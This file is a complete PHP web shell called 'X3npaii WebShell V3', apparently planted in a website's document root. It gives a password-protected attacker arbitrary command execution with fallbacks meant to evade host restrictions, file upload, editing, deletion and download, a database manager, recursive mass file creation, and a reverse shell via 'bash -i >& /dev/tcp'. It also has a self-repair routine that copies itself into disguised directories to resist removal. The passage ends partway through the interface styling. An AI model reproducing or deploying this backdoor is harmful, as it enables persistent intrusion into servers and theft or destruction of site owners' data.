File: /imaginelov/www/v3.php
<?php
// ==============================
// X3npaii WebShell V3
// ==============================
error_reporting(0);
@set_time_limit(0);
date_default_timezone_set('Asia/Tokyo');
// Password Protection
$password = "mctpass"; // Change this password
session_start();
// Track login attempts
if (!isset($_SESSION['attempts'])) {
$_SESSION['attempts'] = 0;
}
// Security Bypass Detection
$is_litespeed = (strpos(@$_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false) ? "True" : "False";
$is_hostgator = (strpos(@$_SERVER['SERVER_NAME'], 'hostgator') !== false) ? "True" : "False";
$is_godaddy = (strpos(@$_SERVER['SERVER_NAME'], 'godaddy') !== false) ? "True" : "False";
$is_hostinger = (strpos(@$_SERVER['SERVER_NAME'], 'hostinger') !== false) ? "True" : "False";
// Bypass Techniques
function bypass_litespeed($cmd) {
if (function_exists('proc_open')) {
$descriptors = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$process = @proc_open($cmd, $descriptors, $pipes);
if (is_resource($process)) {
$output = @stream_get_contents($pipes[1]);
@fclose($pipes[0]);
@fclose($pipes[1]);
@fclose($pipes[2]);
@proc_close($process);
return $output;
}
}
return false;
}
function bypass_hostgator($cmd) {
if (function_exists('shell_exec')) {
return @shell_exec($cmd);
}
return false;
}
function bypass_godaddy($cmd) {
if (function_exists('popen')) {
$handle = @popen($cmd . ' 2>&1', 'r');
$output = '';
while (!@feof($handle)) {
$output .= @fread($handle, 1024);
}
@pclose($handle);
return $output;
}
return false;
}
function bypass_hostinger($cmd) {
if (function_exists('exec')) {
@exec($cmd . ' 2>&1', $output);
return @implode("\n", $output);
}
return false;
}
// Lock File
$lock_file = '.x3npaii.lock';
$current_file = @basename(__FILE__);
// Create lock if it doesn't exist
if (!@file_exists($lock_file)) {
@file_put_contents($lock_file, 'LOCKED');
@chmod($lock_file, 0444);
}
// Self-repair mechanism with enhanced stealth and auto mkdir
register_shutdown_function(function() use ($current_file, $lock_file) {
if (!@file_exists($current_file)) {
// Backup locations (auto create if not exists)
$backup_locations = [
dirname(__FILE__) . '/' . $current_file,
dirname(__FILE__) . '/.htaccess.bak',
dirname(__FILE__) . '/index.php.bak',
dirname(__FILE__) . '/.well-known/' . $current_file,
dirname(__FILE__) . '/wp-includes/' . $current_file,
dirname(__FILE__) . '/cgi-bin/' . $current_file,
dirname(__FILE__) . '/tmp/' . $current_file,
dirname(__FILE__) . '/cache/' . $current_file
];
// Auto-create parent dirs if not exist
foreach ($backup_locations as $location) {
$dir = dirname($location);
if (!@is_dir($dir)) {
@mkdir($dir, 0755, true); // Recursive mkdir
}
}
// Get content from lock file to restore shell
$content = @file_get_contents($lock_file);
if ($content !== false) {
foreach ($backup_locations as $location) {
if (@file_put_contents($location, $content)) {
@chmod($location, 0555); // Read-only
}
}
}
}
});
// Password Protection Logic with enhanced security
if (!isset($_SESSION['loggedin'])) {
if (isset($_POST['password'])) {
if ($_POST['password'] == $password) {
$_SESSION['loggedin'] = true;
$_SESSION['attempts'] = 0;
$_SESSION['ip'] = @$_SERVER['REMOTE_ADDR'];
$_SESSION['user_agent'] = @$_SERVER['HTTP_USER_AGENT'];
} else {
$_SESSION['attempts']++;
$error_msg = "";
if ($_SESSION['attempts'] == 1) {
$error_msg = "Password Wr0ng!! 2x Attempt left...";
} elseif ($_SESSION['attempts'] >= 2) {
$error_msg = "Bruh.. Idiot Senpaii!! Baka Baka... バカバカ...";
@file_put_contents('.x3z_auth.log', date('Y-m-d H:i:s') . " - Failed login from " . @$_SERVER['REMOTE_ADDR'] . "\n", FILE_APPEND);
}
show_login_form($error_msg);
exit;
}
} else {
show_login_form();
exit;
}
}
// Session hijacking protection
if ($_SESSION['ip'] !== @$_SERVER['REMOTE_ADDR'] || $_SESSION['user_agent'] !== @$_SERVER['HTTP_USER_AGENT']) {
session_destroy();
header('Location: '.@basename(__FILE__));
exit;
}
// ==============================
// MAIN SHELL FUNCTIONALITY
// ==============================
// Access Counter
$counter_file = '.x3z_counter';
$access_count = @file_exists($counter_file) ? (int)@file_get_contents($counter_file) : 0;
@file_put_contents($counter_file, ++$access_count);
// Current Directory
$current_dir = isset($_GET['path']) ? $_GET['path'] : @getcwd();
if (!@is_dir($current_dir)) $current_dir = @getcwd();
@chdir($current_dir);
$current_dir = str_replace('\\', '/', @realpath('.'));
// Messages
$message = '';
// Function: Success Message
function success_msg($text) {
return "<div class='success-msg'>🌸 $text</div>";
}
// Function: Error Message
function error_msg($text) {
return "<div class='error-msg'>💢 $text</div>";
}
// Function: Execute Command with Bypass
function execute_command($cmd) {
global $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger;
// Try bypass methods first based on detected environment
if ($is_litespeed === "True") {
$output = bypass_litespeed($cmd);
if ($output !== false) return $output;
}
if ($is_hostgator === "True") {
$output = bypass_hostgator($cmd);
if ($output !== false) return $output;
}
if ($is_godaddy === "True") {
$output = bypass_godaddy($cmd);
if ($output !== false) return $output;
}
if ($is_hostinger === "True") {
$output = bypass_hostinger($cmd);
if ($output !== false) return $output;
}
// Fallback to standard methods
$bypass_methods = [
'system' => function($c) { @ob_start(); @system($c); return @ob_get_clean(); },
'shell_exec' => function($c) { return @shell_exec($c); },
'exec' => function($c) { @exec($c, $r); return @implode("\n", $r); },
'popen' => function($c) { $h = @popen($c . ' 2>&1', 'r'); if (!$h) return ''; $o = ''; while (!@feof($h)) $o .= @fread($h, 1024); @pclose($h); return $o; },
'passthru' => function($c) { @ob_start(); @passthru($c); return @ob_get_clean(); },
'proc_open' => function($c) { $d = [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']]; $p = @proc_open($c, $d, $io); if (!@is_resource($p)) return ''; $o = @stream_get_contents($io[1]); @proc_close($p); return $o; }
];
foreach ($bypass_methods as $func => $method) {
if (function_exists($func)) {
try {
$result = is_callable($method) ? $method($cmd) : $method($cmd);
if (!empty($result)) return $result;
} catch (Exception $e) {
continue;
}
}
}
return 'ERROR: All execution functions are disabled.';
}
// Function: Format File Size
function format_size($bytes) {
if ($bytes === 0) return "0 B";
$k = 1024;
$sizes = ["B", "KB", "MB", "GB", "TB"];
$i = floor(log($bytes) / log($k));
return round($bytes / pow($k, $i), 2) . " " . $sizes[$i];
}
// Extract Archive
if (isset($_GET['extract'])) {
$file_path = $current_dir . '/' . $_GET['extract'];
$file_ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
$file_name = pathinfo($file_path, PATHINFO_FILENAME);
$extract_dir = $current_dir . '/' . $file_name . '_extracted';
if (!@is_dir($extract_dir)) @mkdir($extract_dir);
if ($file_ext === 'zip') {
$zip = new ZipArchive;
if ($zip->open($file_path) === TRUE) {
$zip->extractTo($extract_dir);
$zip->close();
$message .= success_msg("ZIP extracted to $extract_dir");
} else {
$message .= error_msg('Failed to extract ZIP');
}
} elseif ($file_ext === 'rar') {
$output = execute_command('unrar x -o+ ' . escapeshellarg($file_path) . ' ' . escapeshellarg($extract_dir));
if (strpos($output, 'ERROR') === false) {
$message .= success_msg("RAR extracted to $extract_dir");
} else {
$message .= error_msg('Failed to extract RAR');
}
} elseif (strpos($file_path, '.tar') !== false) {
$output = execute_command('tar -xf ' . escapeshellarg($file_path) . ' -C ' . escapeshellarg($extract_dir));
if (empty($output)) {
$message .= success_msg("TAR extracted to $extract_dir");
} else {
$message .= error_msg('Failed to extract TAR');
}
} else {
$message .= error_msg('Unsupported archive format');
}
}
// Execute Command
$cmd_output = '';
if (isset($_POST['exec'])) {
$cmd_output = execute_command($_POST['exec']);
}
// File Upload
if (isset($_FILES['upload'])) {
$target_path = $current_dir . '/' . $_FILES['upload']['name'];
if (@move_uploaded_file($_FILES['upload']['tmp_name'], $target_path)) {
$message .= success_msg("Uploaded file <b>{$_FILES['upload']['name']}</b> to <b>$current_dir</b>");
} else {
$message .= error_msg('Upload failed');
}
}
// Create New File
if (isset($_POST['newfile']) && !empty($_POST['newfile'])) {
if (@file_put_contents($current_dir . '/' . $_POST['newfile'], '')) {
$message .= success_msg("File <b>{$_POST['newfile']}</b> created successfully");
} else {
$message .= error_msg("Failed to create file <b>{$_POST['newfile']}</b>");
}
}
// Create New Directory
if (isset($_POST['newdir']) && !empty($_POST['newdir'])) {
if (@mkdir($current_dir . '/' . $_POST['newdir'])) {
$message .= success_msg("Directory <b>{$_POST['newdir']}</b> created successfully");
} else {
$message .= error_msg("Failed to create directory <b>{$_POST['newdir']}</b>");
}
}
// Rename File/Directory
if (isset($_POST['rename']) && isset($_POST['rename_to']) && !empty($_POST['rename_to'])) {
if (@rename($current_dir . '/' . $_POST['rename'], $current_dir . '/' . $_POST['rename_to'])) {
$message .= success_msg("Renamed <b>{$_POST['rename']}</b> to <b>{$_POST['rename_to']}</b>");
} else {
$message .= error_msg("Failed to rename <b>{$_POST['rename']}</b>");
}
}
// Change File Permissions
if (isset($_POST['chmod']) && isset($_POST['chmodfile'])) {
if (@chmod($current_dir . '/' . $_POST['chmodfile'], octdec($_POST['chmod']))) {
$message .= success_msg("Changed permissions of <b>{$_POST['chmodfile']}</b> to <b>{$_POST['chmod']}</b>");
} else {
$message .= error_msg("Failed to change permissions of <b>{$_POST['chmodfile']}</b>");
}
}
// Delete Files/Directories
if (isset($_POST['delete'])) {
$success = true;
foreach ($_POST['sel'] as $item) {
$target = $current_dir . '/' . $item;
if (@is_dir($target)) {
if (!@rmdir($target)) $success = false;
} else {
if (!@unlink($target)) $success = false;
}
}
if ($success) {
$message .= success_msg('Selected items deleted successfully');
} else {
$message .= error_msg('Failed to delete some items');
}
}
// Move Files
if (isset($_POST['move']) && isset($_POST['target'])) {
$success = true;
foreach ($_POST['sel'] as $item) {
if (!@rename($current_dir . '/' . $item, $_POST['target'] . '/' . $item)) {
$success = false;
}
}
if ($success) {
$message .= success_msg("Moved to <b>{$_POST['target']}</b>");
} else {
$message .= error_msg("Failed to move some items to <b>{$_POST['target']}</b>");
}
}
// Read File Contents
if (isset($_POST['readfile'])) {
$target = $current_dir . '/' . $_POST['readfile'];
if (@is_file($target)) {
$content = htmlspecialchars(@file_get_contents($target));
show_file_viewer($_POST['readfile'], $content, $current_dir);
exit;
}
}
// Edit File
if (isset($_GET['edit'])) {
$file_path = $current_dir . '/' . $_GET['edit'];
if (isset($_POST['save'])) {
if (@file_put_contents($file_path, $_POST['content'])) {
echo "<script>alert('Saved successfully!');window.location='?path=".urlencode($current_dir)."';</script>";
} else {
echo "<script>alert('Failed to save file!');</script>";
}
}
$content = htmlspecialchars(@file_get_contents($file_path));
show_file_editor(basename($file_path), $content, $current_dir);
exit;
}
// Download File
if (isset($_GET['download'])) {
$file_path = $current_dir . '/' . $_GET['download'];
if (@file_exists($file_path)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.@basename($file_path).'"');
header('Content-Length: ' . @filesize($file_path));
@readfile($file_path);
exit;
}
}
// Lock Shell Functionality
if (isset($_GET['lock'])) {
if ($_GET['lock'] === 'enable') {
// Create required directories if not exist
$backup_dirs = [
dirname(__FILE__) . '/.well-known/',
dirname(__FILE__) . '/wp-includes/',
dirname(__FILE__) . '/cgi-bin/',
dirname(__FILE__) . '/tmp/',
dirname(__FILE__) . '/cache/'
];
foreach ($backup_dirs as $dir) {
if (!@is_dir($dir)) {
@mkdir($dir, 0755, true); // Recursive mkdir
}
}
if (@file_put_contents($lock_file, 'LOCKED') && @chmod($lock_file, 0444)) {
$message .= success_msg('Shell lock enabled! This shell will now self-repair if deleted.');
} else {
$message .= error_msg('Failed to enable shell lock!');
}
} elseif ($_GET['lock'] === 'disable') {
if (@chmod($lock_file, 0644) && @unlink($lock_file)) {
$message .= success_msg('Shell lock disabled!');
} else {
$message .= error_msg('Failed to disable shell lock!');
}
}
}
// Reverse Shell
if (isset($_POST['reverse_shell'])) {
$ip = $_POST['ip'];
$port = $_POST['port'];
$cmd = "bash -i >& /dev/tcp/$ip/$port 0>&1";
$output = execute_command($cmd);
$message .= "<pre class='terminal-output'>".htmlspecialchars($output)."</pre>";
}
// ===========================================
// ENHANCED DATABASE MANAGER (V3 IMPROVEMENTS)
// ===========================================
if (isset($_POST['db_manager'])) {
// Auto-open DB Manager tab
$message .= "<script>
window.onload = function() {
document.querySelector('.tab-button[onclick=\"showTab(\\'db-manager\\')\"]').click();
};
</script>";
$db_type = $_POST['db_type'];
$db_host = $_POST['db_host'];
$db_user = $_POST['db_user'];
$db_pass = $_POST['db_pass'];
$db_name = $_POST['db_name'];
try {
switch ($db_type) {
case 'mysql':
case 'mariadb':
$conn = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);
if ($conn) {
$query = $_POST['db_query'];
$result = @mysqli_query($conn, $query);
if ($result) {
// Show tables first if no query specified
if (empty(trim($query))) {
$tables_result = @mysqli_query($conn, "SHOW TABLES");
$message .= "<div class='db-tables'>";
$message .= "<h3>Database Tables</h3>";
$message .= "<div class='table-grid'>";
while ($table = @mysqli_fetch_row($tables_result)) {
$table_name = $table[0];
$message .= "<div class='table-item' onclick=\"document.getElementById('db_query').value='SELECT * FROM `$table_name` LIMIT 50;document.getElementById('db-form').submit();\">";
$message .= "<div class='table-icon'>📊</div>";
$message .= "<div class='table-name'>$table_name</div>";
// Get row count
$count_result = @mysqli_query($conn, "SELECT COUNT(*) FROM `$table_name`");
$row_count = @mysqli_fetch_row($count_result)[0];
$message .= "<div class='table-stats'>$row_count rows</div>";
$message .= "</div>";
}
$message .= "</div></div>";
} else {
// Display query results
$message .= "<div class='db-results'>";
$message .= "<h3>Query Results</h3>";
// Check if it's a SELECT query
if (strtoupper(substr(trim($query), 0, 6)) === 'SELECT') {
$message .= "<div class='query-info'>Showing " . @mysqli_num_rows($result) . " rows</div>";
$message .= "<div class='table-responsive'><table class='db-table'>";
// Get field names
$message .= "<thead><tr>";
while ($field = @mysqli_fetch_field($result)) {
$message .= "<th>" . htmlspecialchars($field->name) . "</th>";
}
$message .= "</tr></thead><tbody>";
// Get data
while ($row = @mysqli_fetch_assoc($result)) {
$message .= "<tr>";
foreach ($row as $value) {
$message .= "<td>" . htmlspecialchars($value) . "</td>";
}
$message .= "</tr>";
}
$message .= "</tbody></table></div>";
} else {
// Non-SELECT query
$affected_rows = @mysqli_affected_rows($conn);
$message .= success_msg("Query executed successfully. Affected rows: $affected_rows");
}
$message .= "</div>";
}
} else {
$message .= error_msg("Query failed: " . @mysqli_error($conn));
}
@mysqli_close($conn);
} else {
$message .= error_msg("MySQL/MariaDB connection failed: " . @mysqli_connect_error());
}
break;
case 'postgresql':
if (function_exists('pg_connect')) {
$conn_str = "host=$db_host dbname=$db_name user=$db_user password=$db_pass";
$conn = @pg_connect($conn_str);
if ($conn) {
$query = $_POST['db_query'];
$result = @pg_query($conn, $query);
if ($result) {
// Show tables first if no query specified
if (empty(trim($query))) {
$tables_result = @pg_query($conn, "SELECT table_name FROM information_schema.tables WHERE table_schema='public'");
$message .= "<div class='db-tables'>";
$message .= "<h3>Database Tables</h3>";
$message .= "<div class='table-grid'>";
while ($table = @pg_fetch_row($tables_result)) {
$table_name = $table[0];
$message .= "<div class='table-item' onclick=\"document.getElementById('db_query').value='SELECT * FROM \"$table_name\" LIMIT 50;document.forms['db-form'].submit();\">";
$message .= "<div class='table-icon'>📊</div>";
$message .= "<div class='table-name'>$table_name</div>";
// Get row count
$count_result = @pg_query($conn, "SELECT COUNT(*) FROM \"$table_name\"");
$row_count = @pg_fetch_row($count_result)[0];
$message .= "<div class='table-stats'>$row_count rows</div>";
$message .= "</div>";
}
$message .= "</div></div>";
} else {
// Display query results
$message .= "<div class='db-results'>";
$message .= "<h3>Query Results</h3>";
// Check if it's a SELECT query
if (strtoupper(substr(trim($query), 0, 6)) === 'SELECT') {
$message .= "<div class='query-info'>Showing " . @pg_num_rows($result) . " rows</div>";
$message .= "<div class='table-responsive'><table class='db-table'>";
// Get field names
$num_fields = @pg_num_fields($result);
$message .= "<thead><tr>";
for ($i = 0; $i < $num_fields; $i++) {
$message .= "<th>" . htmlspecialchars(@pg_field_name($result, $i)) . "</th>";
}
$message .= "</tr></thead><tbody>";
// Get data
while ($row = @pg_fetch_assoc($result)) {
$message .= "<tr>";
foreach ($row as $value) {
$message .= "<td>" . htmlspecialchars($value) . "</td>";
}
$message .= "</tr>";
}
$message .= "</tbody></table></div>";
} else {
// Non-SELECT query
$affected_rows = @pg_affected_rows($result);
$message .= success_msg("Query executed successfully. Affected rows: $affected_rows");
}
$message .= "</div>";
}
} else {
$message .= error_msg("Query failed: " . @pg_last_error($conn));
}
@pg_close($conn);
} else {
$message .= error_msg("PostgreSQL connection failed");
}
} else {
$message .= error_msg("PostgreSQL functions not available");
}
break;
case 'sqlite':
if (class_exists('SQLite3')) {
try {
$conn = new SQLite3($db_name);
$query = $_POST['db_query'];
// Show tables first if no query specified
if (empty(trim($query))) {
$tables_result = $conn->query("SELECT name FROM sqlite_master WHERE type='table'");
$message .= "<div class='db-tables'>";
$message .= "<h3>Database Tables</h3>";
$message .= "<div class='table-grid'>";
while ($table = $tables_result->fetchArray(SQLITE3_NUM)) {
$table_name = $table[0];
$message .= "<div class='table-item' onclick=\"document.getElementById('db_query').value='SELECT * FROM `$table_name` LIMIT 50;document.forms['db-form'].submit();\">";
$message .= "<div class='table-icon'>📊</div>";
$message .= "<div class='table-name'>$table_name</div>";
// Get row count
$count_result = $conn->querySingle("SELECT COUNT(*) FROM `$table_name`");
$message .= "<div class='table-stats'>$count_result rows</div>";
$message .= "</div>";
}
$message .= "</div></div>";
} else {
$result = $conn->query($query);
if ($result || strtoupper(substr(trim($query), 0, 6)) !== 'SELECT') {
$message .= "<div class='db-results'>";
$message .= "<h3>Query Results</h3>";
// Check if it's a SELECT query
if (strtoupper(substr(trim($query), 0, 6)) === 'SELECT') {
$message .= "<div class='table-responsive'><table class='db-table'>";
// Get field names
$num_cols = $result->numColumns();
$message .= "<thead><tr>";
for ($i = 0; $i < $num_cols; $i++) {
$message .= "<th>" . htmlspecialchars($result->columnName($i)) . "</th>";
}
$message .= "</tr></thead><tbody>";
// Get data
while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
$message .= "<tr>";
foreach ($row as $value) {
$message .= "<td>" . htmlspecialchars($value) . "</td>";
}
$message .= "</tr>";
}
$message .= "</tbody></table></div>";
} else {
// Non-SELECT query
$changes = $conn->changes();
$message .= success_msg("Query executed successfully. Affected rows: $changes");
}
$message .= "</div>";
} else {
$message .= error_msg("Query failed");
}
}
$conn->close();
} catch (Exception $e) {
$message .= error_msg("SQLite error: " . $e->getMessage());
}
} else {
$message .= error_msg("SQLite3 not supported");
}
break;
default:
$message .= error_msg("Unsupported database type");
break;
}
} catch (Exception $e) {
$message .= error_msg("Database error: " . $e->getMessage());
}
}
// Terminal
if (isset($_POST['terminal'])) {
$cmd = $_POST['terminal_cmd'];
$output = execute_command($cmd);
$message .= "<pre class='terminal-output'>".htmlspecialchars($output)."</pre>";
}
// Mass File Creation (Recursive)
if (isset($_POST['mass_create'])) {
$filename = $_POST['mass_filename'];
$note = $_POST['mass_note'];
$created = 0;
$failed = 0;
function createInSubdirs($dir, $filename, $note, &$created, &$failed, &$message) {
$items = @scandir($dir);
if ($items) {
foreach ($items as $item) {
if ($item != '.' && $item != '..') {
$path = $dir . '/' . $item;
if (@is_dir($path)) {
$filepath = $path . '/' . $filename;
if (@file_put_contents($filepath, "\n$note")) {
$created++;
$message .= success_msg("Created file <b>$filename</b> in <b>$path</b>");
} else {
$failed++;
$message .= error_msg("Failed to create file <b>$filename</b> in <b>$path</b>");
}
createInSubdirs($path, $filename, $note, $created, $failed, $message);
}
}
}
}
}
createInSubdirs($current_dir, $filename, $note, $created, $failed, $message);
$message .= success_msg("Mass Create Complete: $created files created, $failed failed");
}
// Show login form
function show_login_form($error_msg = '') {
echo '
<!DOCTYPE html>
<html>
<head>
<title>X3npaii WebShell V3 - Login</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
background-size: cover;
font-family: "Segoe UI", "Meiryo", sans-serif;
color: #fff;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
}
.login-box {
background: rgba(26, 26, 46, 0.9);
padding: 30px;
border-radius: 15px;
box-shadow: 0 0 20px rgba(255, 105, 180, 0.5);
width: 90%;
max-width: 350px;
text-align: center;
backdrop-filter: blur(5px);
border: 1px solid #ff69b4;
position: relative;
overflow: hidden;
}
.login-box::before {
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
height: 3px;
background: linear-gradient(90deg, #ff69b4, #ff1493, #9c27b0);
}
.login-box h1 {
color: #ff69b4;
margin-bottom: 20px;
font-size: 24px;
text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
}
.login-box h3 {
color: #fff;
margin-bottom: 20px;
font-size: 18px;
}
.login-box input[type="password"] {
width: 100%;
padding: 12px;
margin-bottom: 20px;
border: 1px solid #ff69b4;
border-radius: 8px;
background: rgba(255, 255, 255, 0.1);
color: #fff;
font-size: 16px;
box-sizing: border-box;
transition: all 0.3s;
}
.login-box input[type="password"]:focus {
outline: none;
border-color: #ff1493;
box-shadow: 0 0 0 2px rgba(255, 20, 147, 0.3);
}
.login-box button {
width: 100%;
padding: 12px;
background: linear-gradient(135deg, #ff69b4, #ff1493);
border: none;
border-radius: 8px;
color: white;
font-size: 16px;
cursor: pointer;
transition: all 0.3s;
}
.login-box button:hover {
background: linear-gradient(135deg, #ff1493, #ff69b4);
box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
transform: translateY(-2px);
}
.login-box button:active {
transform: translateY(0);
}
.error {
color: #ff4444;
background: rgba(255, 0, 0, 0.1);
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
border-left: 4px solid #ff4444;
display: flex;
align-items: center;
}
.error::before {
content: "✗";
margin-right: 8px;
font-weight: bold;
}
.anime-char {
position: fixed;
bottom: 20px;
right: 20px;
width: 120px;
opacity: 0.8;
z-index: -1;
filter: drop-shadow(0 0 5px rgba(255, 105, 180, 0.7));
animation: float 3s ease-in-out infinite;
}
@keyframes float {
0%, 100% { transform: translateY(0); }
50% { transform: translateY(-10px); }
}
</style>
</head>
<body>
<div class="login-box">
<h1>X3npaii WebShell V3</h1>
<h3>Hi! Senpaii >_<</h3>
'.(!empty($error_msg) ? '<div class="error">'.$error_msg.'</div>' : '').'
<form method="POST">
<input type="password" name="password" placeholder="Enter Password..." required/>
<button type="submit">Login</button>
</form>
</div>
<img src="https://i.imgur.com/5a4e8a8f7a5.png " class="anime-char" alt="Anime Character">
</body>
</html>';
}
// Show file viewer
function show_file_viewer($filename, $content, $current_dir) {
echo '<!DOCTYPE html>
<html>
<head>
<title>Viewing: '.htmlspecialchars($filename).'</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
background-size: cover;
font-family: "Segoe UI", "Meiryo", sans-serif;
color: #fff;
padding: 20px;
}
h3 {
color: #ff69b4;
margin-bottom: 15px;
text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
}
textarea {
width: 100%;
height: 70vh;
background: rgba(26, 26, 46, 0.8);
color: #fff;
border: 1px solid #ff69b4;
border-radius: 8px;
padding: 15px;
font-family: monospace;
resize: none;
}
a {
display: inline-block;
margin-top: 15px;
padding: 8px 15px;
background: linear-gradient(135deg, #ff69b4, #ff1493);
border-radius: 8px;
color: white;
text-decoration: none;
transition: all 0.3s;
}
a:hover {
background: linear-gradient(135deg, #ff1493, #ff69b4);
box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
}
</style>
</head>
<body>
<h3>Viewing: '.htmlspecialchars($filename).'</h3>
<form>
<textarea readonly>'.$content.'</textarea>
<br>
<a href="?path='.urlencode($current_dir).'">Back</a>
</form>
</body>
</html>';
}
// Show file editor
function show_file_editor($filename, $content, $current_dir) {
echo '<!DOCTYPE html>
<html>
<head>
<title>Editing: '.htmlspecialchars($filename).'</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
background-size: cover;
font-family: "Segoe UI", "Meiryo", sans-serif;
color: #fff;
padding: 20px;
}
h3 {
color: #ff69b4;
margin-bottom: 15px;
text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
}
textarea {
width: 100%;
height: 70vh;
background: rgba(26, 26, 46, 0.8);
color: #fff;
border: 1px solid #ff69b4;
border-radius: 8px;
padding: 15px;
font-family: monospace;
}
input[type="submit"] {
display: inline-block;
margin-top: 15px;
padding: 8px 15px;
background: linear-gradient(135deg, #ff69b4, #ff1493);
border: none;
border-radius: 8px;
color: white;
cursor: pointer;
transition: all 0.3s;
}
input[type="submit"]:hover {
background: linear-gradient(135deg, #ff1493, #ff69b4);
box-shadow: 0 0 10px rgba(255, 105, 180, 0.7);
}
</style>
</head>
<body>
<h3>Edit: '.htmlspecialchars($filename).'</h3>
<form method="POST">
<textarea name="content">'.$content.'</textarea>
<br>
<input type="submit" name="save" value="Save">
</form>
</body>
</html>';
}
// Show main shell interface
show_shell_interface($message, $cmd_output, $current_dir, $access_count, $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger);
function show_shell_interface($message, $cmd_output, $current_dir, $access_count, $is_litespeed, $is_hostgator, $is_godaddy, $is_hostinger) {
echo '<!DOCTYPE html>
<html>
<head>
<title>X3npaii WebShell V3</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<style>
:root {
--main-color: #ff69b4;
--secondary-color: #ff1493;
--bg-color: rgba(26, 26, 46, 0.85);
--text-color: #fff;
--accent-color: #9c27b0;
}
* {
box-sizing: border-box;
margin: 0;
padding: 0;
font-family: "Segoe UI", "Meiryo", "Hiragino Kaku Gothic Pro", sans-serif;
}
body {
background: #1a1a2e url("https://64.media.tumblr.com/0e8f9a82511886517d441922e39c0e2c/c7e3fe76eb261d6e-77/s400x600/75b5a0286e5188997cf241101bef2c813e11a66e.gif ") no-repeat center center fixed;
background-size: cover;
color: var(--text-color);
line-height: 1.6;
padding: 0;
margin: 0;
min-height: 100vh;
backdrop-filter: blur(2px);
overflow-x: hidden;
}
.wrapper {
display: flex;
flex-direction: column;
min-height: 100vh;
padding: 15px;
}
.header {
background: var(--bg-color);
padding: 15px;
border-radius: 15px;
margin-bottom: 20px;
box-shadow: 0 0 15px rgba(255, 105, 180, 0.5);
border: 1px solid var(--main-color);
backdrop-filter: blur(5px);
position: relative;
overflow: hidden;
}
.header::before {
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
height: 3px;
background: linear-gradient(90deg, var(--main-color), var(--secondary-color), var(--accent-color));
}
.header h1 {
color: var(--main-color);
margin: 0 0 5px 0;
font-size: 1.5rem;
text-shadow: 0 0 5px rgba(255, 105, 180, 0.7);
display: flex;
align-items: center;
}
.header h1::before {
content: "🌸";
margin-right: 10px;
font-size: 1.2em;
}
.header .info {
font-size: 0.7rem;
color: #aaa;
display: flex;
flex-wrap: wrap;
gap: 10px;
}
.header .info span {
background: rgba(0, 0, 0, 0.3);
padding: 3px 6px;
border-radius: 3px;
}
.message-container {
margin-bottom: 15px;
}
.success-msg {
color: #4caf50;
background: rgba(76, 175, 80, 0.15);
padding: 12px;
border-radius: 8px;
margin-bottom: 15px;
border-left: 4px solid #4caf50;
display: flex;
align-items: center;
backdrop-filter: blur(2px);
}
.success-msg::before {
content: "✓";
margin-right: 8px;
font-weight: bold;
}
.error-msg {
color: #f44336;
background: rgba(244, 67, 54, 0.15);
padding: 12px;
border-radius: 8px;
margin-bottom: 15px;
border-left: 4px solid #f44336;
display: flex;
align-items: center;
backdrop-filter: blur(2px);
}
.error-msg::before {
content: "✗";
margin-right: 8px;
font-weight: bold;
}
.container {
display: flex;
flex-direction: column;
gap: 20px;
flex: 1;
}
.panel {
background: var(--bg-color);
border-radius: 15px;
padding: 15px;
box-shadow: 0 0 15px rgba(255, 105, 180, 0.3);
border: 1px solid var(--main-color);
backdrop-filter: blur(5px);
position: relative;
overflow: hidden;
}
.panel::before {
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
height: 3px;
background: linear-gradient(90deg, var(--main-color), var(--secondary-color));
}
.panel h2 {
color: var(--main-color);
margin: 0 0 15px 0;
font-size: 1.2rem;
display: flex;
align-items: center;
}
.panel h2::before {
content: "✧";
margin-right: 8px;
font-size: 1em;
}
input[type="text"],
input[type="password"],
textarea,
select {
width: 100%;
padding: 12px;
margin-bottom: 15px;
border: 1px solid var(--main-color);
border-radius: 8px;
background: rgba(255, 255, 255, 0.1);
color: var(--text-color);
font-size: 0.9rem;
transition: all 0.3s;
}
input[type="text"]:focus,
input[type="password"]:focus,
textarea:focus,
select:focus {
outline: none;
border-color: var(--secondary-color);
box-shadow: 0 0 0 2px rgba(255, 20, 147, 0.3);
}
button,
input[type="submit"],
.button {
background: linear-gradient(135deg, var(--main-color), var(--secondary-color));
border: none;
border-radius: 8px;
color: white;
padding: 12px 20px;
cursor: pointer;
transition: all 0.3s;
font-size: 0.9rem;
font-weight: 500;
display: inline-flex;
align-items: center;
justify-content: center;
text-decoration: none;
}
